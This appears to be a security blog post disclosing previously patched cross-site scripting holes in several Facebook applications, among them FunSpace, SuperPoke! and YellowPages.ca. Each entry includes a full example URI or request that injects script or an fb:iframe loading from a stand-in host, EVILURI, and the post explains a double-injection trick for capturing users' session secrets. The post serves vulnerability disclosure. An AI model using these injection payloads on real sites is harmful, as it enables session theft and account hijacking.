FAXX Hacks: Previous Vulnerabilities

Before the first new report in the FAXX series, I thought I would begin by reviewing a few previous holes that have (mostly) already been patched.

FAXX Hack: FunSpace

Facebook Verified Application

Current Monthly Active Users: 8,527,725

Current Rank on Application Leaderboard: 20

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22(&CXNID=1000005.8NXC

FAXX Hack: SuperPoke!

Facebook Verified Application

Current Monthly Active Users: 2,097,148

Current Rank on Application Leaderboard: 71

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E

FAXX Hack: SocialToo

Current Monthly Active Users: 1,835

Application Developer: Stay N’ Alive Productions, LLC

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example POST Request: http://apps.facebook.com/socialtoo/vanity?submit=Update&username=\”><fb:iframe src=’http://EVILURI/’>

Notes: This application generally has extended permissions, such as status_update.

FAXX Hack: YellowPages.ca

Reported By: Uber0n at XSSed.com on March 22, 2009

Current Monthly Active Users: 1,198

Application Developer: Yellow Pages Group Co.

Vulnerability Status: Unpatched Patched as of Sep. 2, 2009

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada

Notes: The above example demonstrates a double injection trick I began using for FBML applications. First, the hole is used to insert an <fb:iframe> tag into the FBML of the canvas page. Second, this inserted iframe loads the direct URI of the application page, with the hole exploited a second time to insert a script file, since the iframe loads as HTML rather than FBML. Since the domain of the iframe matches the application domain, the iframe receives the user’s session secret.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark


Share with your friends!
  • Facebook
  • Twitter
  • Google Plus
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Comments are closed.

Email